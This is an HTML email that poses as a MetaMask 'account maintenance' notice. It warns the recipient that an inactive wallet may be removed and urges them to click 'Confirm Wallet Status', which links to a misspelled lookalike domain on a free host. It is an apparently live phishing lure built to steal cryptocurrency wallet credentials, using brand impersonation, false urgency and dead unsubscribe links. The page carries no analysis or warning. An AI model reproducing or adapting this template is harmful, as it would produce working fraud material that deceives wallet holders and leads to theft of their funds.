<!DOCTYPE html>

<html lang="en"><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="UTF-8">
  <title>MetaMask Account Maintenance</title>
  <style>
    @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;700&display=swap');
    body {
      font-family: 'Inter', Arial, sans-serif;
      color: #1c1c1c;
      line-height: 1.5;
      margin: 20px;
      background-color: #fff;
    }
    .header {
      font-size: 20px;
      font-weight: 700;
      color: #f6851b;
      margin-bottom: 20px;
      display: flex;
      align-items: center;
      gap: 15px;
    }
    .header img {
      height: 64px;
      width: 64px;
      border: 0;
      display: block;
    }
    .header-text {
      font-size: 24px;
      font-weight: 700;
    }
    .content p {
      margin: 12px 0;
      font-size: 16px;
    }
    .cta {
      display: inline-block;
      margin-top: 25px;
      padding: 12px 24px;
      background-color: #f6851b;
      color: white;
      text-decoration: none;
      border-radius: 8px;
      font-weight: 700;
      font-size: 16px;
      transition: background-color 0.3s ease;
    }
    .cta:hover {
      background-color: #d36c15;
    }
    .footer {
      margin-top: 35px;
      font-size: 13px;
      color: #555;
    }
    .footer a {
      color: #f6851b;
      text-decoration: none;
    }
    .footer a:hover {
      text-decoration: underline;
    }
    .warning {
      color: #cc3300;
      font-size: 13px;
    }
  </style>
</head>
<body>
  <div style="font-size: 20px;
      font-weight: 700;
      color: #f6851b;
      margin-bottom: 20px;
      display: flex;
      align-items: center;
      gap: 15px" class="header" role="banner">
    <img style="height: 64px;
      width: 64px;
      border: 0;
      display: block" width="64" height="64" alt="MetaMask Logo" src="https://cdn.iconscout.com/icon/free/png-256/metamask-2728406-2261817.png">
    <div class="header-text">MetaMask Systems</div>
  </div>

  <div class="content" role="main">
    <br>
Dear User,<p style="margin: 12px 0;
      font-size: 16px; border-width: 0px; border-style: solid; margin: 1rem 0px 0.5rem; text-transform: none; text-indent: 0px; letter-spacing: 0.08px; font-family: fkGroteskNeue, ui-sans-serif, system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji", "Hiragino Sans", 
"PingFang SC", "Apple SD Gothic Neo", "Yu Gothic", "Microsoft YaHei", "Microsoft JhengHei", Meiryo; font-size: 16px; font-style: normal; font-weight: 400; word-spacing: 0px; white-space: normal; box-sizing: border-box; orphans: 2; widows: 2; scrollbar-color: initial; scrollbar-width: initial; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;" class="my-2 [&+p]:mt-4 [&_strong:has(+br)]:inline-block [&_strong:has(+br)]:pb-2">
As part of our routine account maintenance, we are currently verifying the status of wallets linked to your MetaMask profile. Our records indicate that one of your registered wallets has shown no recent activity. To ensure it remains securely associated with your account, please confirm that you are still actively using this wallet.</p>
    <p style="margin: 12px 0;
      font-size: 16px"><a class="cta" href="https://metamakswallet.byethost11.com/" target="_blank" rel="noopener noreferrer">Confirm Wallet Status</a></p>
    <p class="warning">If the wallet is no longer active, no action is required. It may be removed from our system during the next update.</p>
    <p style="margin: 12px 0;
      font-size: 16px">Thank you.<br>MetaMask Operations</p>
  </div>

  <div style="margin-top: 35px;
      font-size: 13px;
      color: #555" class="footer" role="contentinfo">
    This notification relates to your MetaMask account settings.<br>
    You can <a style="color: #f6851b;
      text-decoration: none" href="#" target="_blank" rel="noopener noreferrer">update your email preferences</a> or <a style="color: #f6851b;
      text-decoration: none" href="#" target="_blank" rel="noopener noreferrer">unsubscribe</a>.
  </div>


</body></html>